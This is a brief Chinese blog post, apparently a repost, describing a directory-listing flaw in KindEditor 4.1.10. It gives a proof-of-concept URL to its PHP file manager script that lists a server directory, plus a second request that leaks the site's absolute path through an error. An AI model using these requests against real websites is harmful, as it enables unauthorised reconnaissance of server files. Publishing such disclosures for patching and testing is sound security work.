Kindeditor 4.1.10列目录漏洞

Kindeditor列目录漏洞

测试环境:KindEditor 4.1.10

PoC:http://localhost/kindeditor/php/file_manager_json.php?path=/var/www/html/

报错信息泄露网站绝对路径:http://localhost/kindeditor/php/file_manager_json.php?path=/

猜你喜欢

转载自www.cnblogs.com/dgjnszf/p/12110919.html